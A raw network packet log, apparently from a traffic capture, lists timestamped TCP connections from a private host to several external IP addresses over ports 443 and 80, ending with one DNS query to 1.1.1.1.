Nov 10, 2024 04:55:10.991832018 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:10.991836071 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:10.991861105 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:10.991871119 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:10.991877079 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:10.991897106 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:10.991930962 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:10.991935015 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:10.992006063 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:10.997719049 CET	443	49727	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:10.997785091 CET	49727	443	192.168.2.5	23.32.185.164
Nov 10, 2024 04:55:11.001004934 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.001049995 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.001070023 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.001086950 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.001127005 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.001133919 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.001164913 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.001482010 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.001524925 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.001529932 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.001650095 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.001692057 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.001697063 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.002270937 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.002300024 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.002317905 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.002321959 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.002350092 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.002360106 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.002366066 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.002412081 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.003274918 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.005706072 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.005753040 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.005757093 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.012028933 CET	49727	443	192.168.2.5	23.32.185.164
Nov 10, 2024 04:55:11.012038946 CET	443	49727	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:11.012250900 CET	443	49727	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:11.013659000 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.013701916 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.013706923 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.056404114 CET	49727	443	192.168.2.5	23.32.185.164
Nov 10, 2024 04:55:11.056410074 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.072647095 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.072716951 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.072758913 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.072763920 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.073115110 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.073154926 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.073158979 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.074886084 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.074913979 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.074934959 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.074939013 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.074964046 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.074976921 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.074982882 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.075036049 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.079197884 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.080315113 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.080353975 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.080353975 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.080363989 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.080400944 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.087903976 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.093117952 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.093161106 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.093164921 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.099459887 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.099493027 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.099503994 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.099510908 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.099551916 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.105077982 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.111092091 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.111128092 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.111133099 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.117003918 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.117059946 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.117063999 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.123091936 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.123131990 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.123141050 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.129163027 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.129204035 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.129209042 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.135164976 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.135206938 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.135210991 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.135216951 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.135257959 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.141513109 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.147814989 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.147840977 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.147861958 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.147867918 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.147906065 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.153460026 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.190025091 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.190051079 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.190074921 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.190079927 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.190134048 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.190172911 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.190530062 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.190566063 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.190571070 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.190701962 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.190735102 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.190754890 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.190758944 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.190793037 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.190797091 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.191353083 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.191390991 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.191395998 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.193778038 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.193814993 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.193823099 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.193826914 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.193866014 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.199219942 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.204704046 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.204741955 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.204756021 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.204761982 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.204798937 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.209952116 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.212958097 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.212982893 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.213001013 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.213005066 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.213054895 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.219783068 CET	49727	443	192.168.2.5	23.32.185.164
Nov 10, 2024 04:55:11.222403049 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.222444057 CET	443	49723	142.250.186.174	192.168.2.5
Nov 10, 2024 04:55:11.222491026 CET	49723	443	192.168.2.5	142.250.186.174
Nov 10, 2024 04:55:11.263334990 CET	443	49727	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:11.317142963 CET	443	49728	216.58.206.78	192.168.2.5
Nov 10, 2024 04:55:11.317595005 CET	49728	443	192.168.2.5	216.58.206.78
Nov 10, 2024 04:55:11.317603111 CET	443	49728	216.58.206.78	192.168.2.5
Nov 10, 2024 04:55:11.317912102 CET	443	49728	216.58.206.78	192.168.2.5
Nov 10, 2024 04:55:11.317989111 CET	49728	443	192.168.2.5	216.58.206.78
Nov 10, 2024 04:55:11.318519115 CET	443	49728	216.58.206.78	192.168.2.5
Nov 10, 2024 04:55:11.318564892 CET	49728	443	192.168.2.5	216.58.206.78
Nov 10, 2024 04:55:11.326155901 CET	49728	443	192.168.2.5	216.58.206.78
Nov 10, 2024 04:55:11.326246977 CET	443	49728	216.58.206.78	192.168.2.5
Nov 10, 2024 04:55:11.326416016 CET	49728	443	192.168.2.5	216.58.206.78
Nov 10, 2024 04:55:11.326422930 CET	443	49728	216.58.206.78	192.168.2.5
Nov 10, 2024 04:55:11.326441050 CET	49728	443	192.168.2.5	216.58.206.78
Nov 10, 2024 04:55:11.336850882 CET	80	49726	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:11.336919069 CET	49726	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:11.370902061 CET	49728	443	192.168.2.5	216.58.206.78
Nov 10, 2024 04:55:11.370907068 CET	443	49728	216.58.206.78	192.168.2.5
Nov 10, 2024 04:55:11.435271025 CET	49730	443	192.168.2.5	4.175.87.197
Nov 10, 2024 04:55:11.435323000 CET	443	49730	4.175.87.197	192.168.2.5
Nov 10, 2024 04:55:11.435431957 CET	49730	443	192.168.2.5	4.175.87.197
Nov 10, 2024 04:55:11.436904907 CET	49730	443	192.168.2.5	4.175.87.197
Nov 10, 2024 04:55:11.436923981 CET	443	49730	4.175.87.197	192.168.2.5
Nov 10, 2024 04:55:11.469573021 CET	443	49727	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:11.469692945 CET	443	49727	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:11.470103025 CET	49727	443	192.168.2.5	23.32.185.164
Nov 10, 2024 04:55:11.472848892 CET	49727	443	192.168.2.5	23.32.185.164
Nov 10, 2024 04:55:11.472863913 CET	443	49727	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:11.472877026 CET	49727	443	192.168.2.5	23.32.185.164
Nov 10, 2024 04:55:11.472882986 CET	443	49727	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:11.549520016 CET	49726	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:11.554357052 CET	80	49726	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:11.568557978 CET	49731	443	192.168.2.5	23.32.185.164
Nov 10, 2024 04:55:11.568581104 CET	443	49731	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:11.568720102 CET	49731	443	192.168.2.5	23.32.185.164
Nov 10, 2024 04:55:11.569510937 CET	49731	443	192.168.2.5	23.32.185.164
Nov 10, 2024 04:55:11.569519997 CET	443	49731	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:11.613210917 CET	49719	443	192.168.2.5	142.250.185.68
Nov 10, 2024 04:55:11.618621111 CET	49728	443	192.168.2.5	216.58.206.78
Nov 10, 2024 04:55:12.336067915 CET	80	49726	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:12.336297035 CET	49726	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:12.397789001 CET	443	49731	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:12.397887945 CET	49731	443	192.168.2.5	23.32.185.164
Nov 10, 2024 04:55:12.413502932 CET	49731	443	192.168.2.5	23.32.185.164
Nov 10, 2024 04:55:12.413521051 CET	443	49731	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:12.413710117 CET	443	49731	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:12.415117025 CET	49731	443	192.168.2.5	23.32.185.164
Nov 10, 2024 04:55:12.455333948 CET	443	49731	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:12.579534054 CET	443	49730	4.175.87.197	192.168.2.5
Nov 10, 2024 04:55:12.579605103 CET	49730	443	192.168.2.5	4.175.87.197
Nov 10, 2024 04:55:12.671431065 CET	443	49731	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:12.671571970 CET	443	49731	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:12.671650887 CET	49731	443	192.168.2.5	23.32.185.164
Nov 10, 2024 04:55:12.744915962 CET	49730	443	192.168.2.5	4.175.87.197
Nov 10, 2024 04:55:12.744944096 CET	443	49730	4.175.87.197	192.168.2.5
Nov 10, 2024 04:55:12.745230913 CET	443	49730	4.175.87.197	192.168.2.5
Nov 10, 2024 04:55:12.784668922 CET	49731	443	192.168.2.5	23.32.185.164
Nov 10, 2024 04:55:12.784708023 CET	443	49731	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:12.784939051 CET	49731	443	192.168.2.5	23.32.185.164
Nov 10, 2024 04:55:12.784945965 CET	443	49731	23.32.185.164	192.168.2.5
Nov 10, 2024 04:55:12.792784929 CET	49730	443	192.168.2.5	4.175.87.197
Nov 10, 2024 04:55:13.992057085 CET	49730	443	192.168.2.5	4.175.87.197
Nov 10, 2024 04:55:14.035331011 CET	443	49730	4.175.87.197	192.168.2.5
Nov 10, 2024 04:55:14.373955965 CET	443	49730	4.175.87.197	192.168.2.5
Nov 10, 2024 04:55:14.373981953 CET	443	49730	4.175.87.197	192.168.2.5
Nov 10, 2024 04:55:14.373990059 CET	443	49730	4.175.87.197	192.168.2.5
Nov 10, 2024 04:55:14.374000072 CET	443	49730	4.175.87.197	192.168.2.5
Nov 10, 2024 04:55:14.374030113 CET	443	49730	4.175.87.197	192.168.2.5
Nov 10, 2024 04:55:14.374120951 CET	49730	443	192.168.2.5	4.175.87.197
Nov 10, 2024 04:55:14.374120951 CET	49730	443	192.168.2.5	4.175.87.197
Nov 10, 2024 04:55:14.374135017 CET	443	49730	4.175.87.197	192.168.2.5
Nov 10, 2024 04:55:14.374335051 CET	49730	443	192.168.2.5	4.175.87.197
Nov 10, 2024 04:55:14.374419928 CET	443	49730	4.175.87.197	192.168.2.5
Nov 10, 2024 04:55:14.374495983 CET	49730	443	192.168.2.5	4.175.87.197
Nov 10, 2024 04:55:14.374504089 CET	443	49730	4.175.87.197	192.168.2.5
Nov 10, 2024 04:55:14.499521017 CET	443	49730	4.175.87.197	192.168.2.5
Nov 10, 2024 04:55:14.503262997 CET	49730	443	192.168.2.5	4.175.87.197
Nov 10, 2024 04:55:15.827399015 CET	49730	443	192.168.2.5	4.175.87.197
Nov 10, 2024 04:55:15.827425003 CET	443	49730	4.175.87.197	192.168.2.5
Nov 10, 2024 04:55:15.827438116 CET	49730	443	192.168.2.5	4.175.87.197
Nov 10, 2024 04:55:15.827442884 CET	443	49730	4.175.87.197	192.168.2.5
Nov 10, 2024 04:55:16.119688034 CET	49743	443	192.168.2.5	94.245.104.56
Nov 10, 2024 04:55:16.119718075 CET	443	49743	94.245.104.56	192.168.2.5
Nov 10, 2024 04:55:16.119785070 CET	49743	443	192.168.2.5	94.245.104.56
Nov 10, 2024 04:55:16.122042894 CET	49743	443	192.168.2.5	94.245.104.56
Nov 10, 2024 04:55:16.122055054 CET	443	49743	94.245.104.56	192.168.2.5
Nov 10, 2024 04:55:16.504602909 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:16.504633904 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:16.504903078 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:16.510705948 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:16.510716915 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.195858002 CET	443	49743	94.245.104.56	192.168.2.5
Nov 10, 2024 04:55:17.197704077 CET	49743	443	192.168.2.5	94.245.104.56
Nov 10, 2024 04:55:17.197719097 CET	443	49743	94.245.104.56	192.168.2.5
Nov 10, 2024 04:55:17.198574066 CET	443	49743	94.245.104.56	192.168.2.5
Nov 10, 2024 04:55:17.198654890 CET	49743	443	192.168.2.5	94.245.104.56
Nov 10, 2024 04:55:17.200516939 CET	49743	443	192.168.2.5	94.245.104.56
Nov 10, 2024 04:55:17.200570107 CET	443	49743	94.245.104.56	192.168.2.5
Nov 10, 2024 04:55:17.200813055 CET	49743	443	192.168.2.5	94.245.104.56
Nov 10, 2024 04:55:17.200819016 CET	443	49743	94.245.104.56	192.168.2.5
Nov 10, 2024 04:55:17.241233110 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.241324902 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.258925915 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.258936882 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.259128094 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.342972994 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.355655909 CET	49743	443	192.168.2.5	94.245.104.56
Nov 10, 2024 04:55:17.389854908 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.435337067 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.438251972 CET	443	49743	94.245.104.56	192.168.2.5
Nov 10, 2024 04:55:17.450891018 CET	49743	443	192.168.2.5	94.245.104.56
Nov 10, 2024 04:55:17.450923920 CET	443	49743	94.245.104.56	192.168.2.5
Nov 10, 2024 04:55:17.451041937 CET	443	49743	94.245.104.56	192.168.2.5
Nov 10, 2024 04:55:17.451095104 CET	49743	443	192.168.2.5	94.245.104.56
Nov 10, 2024 04:55:17.451107025 CET	49743	443	192.168.2.5	94.245.104.56
Nov 10, 2024 04:55:17.500226021 CET	80	49726	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:17.500305891 CET	49726	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:17.633055925 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.633079052 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.633095980 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.633128881 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.633141041 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.633152008 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.633167028 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.633187056 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.633217096 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.633234024 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.635204077 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.635210991 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.635236025 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.635277033 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.635287046 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.635315895 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.635324001 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.750577927 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.750600100 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.750685930 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.750698090 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.750758886 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.751600981 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.751616955 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.751694918 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.751698971 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.751735926 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.753380060 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.753393888 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.753470898 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.753475904 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.753525972 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.838861942 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.839297056 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.867486954 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.867501020 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.867593050 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.867599964 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.867647886 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.868259907 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.868277073 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.868313074 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.868318081 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.868345022 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.868355989 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.868961096 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.868978977 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.869030952 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.869035959 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.869061947 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.869081020 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.869848967 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.869863033 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.869903088 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.869908094 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.869940042 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.869951963 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.870714903 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.870729923 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.870779991 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.870784044 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.872581005 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.872602940 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.872641087 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.872646093 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.872673035 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.872694969 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.873389006 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.873404980 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.873441935 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.873446941 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.873469114 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.873487949 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.985018015 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.985038042 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.985074043 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.985083103 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.985090971 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.985131979 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:17.985158920 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:17.985169888 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:18.075494051 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:18.123620987 CET	49744	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:18.123632908 CET	443	49744	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:18.649910927 CET	49751	53	192.168.2.5	1.1.1.1
Nov 10, 2024 04:55:18.654736042 CET	53	49751	1.1.1.1	192.168.2.5
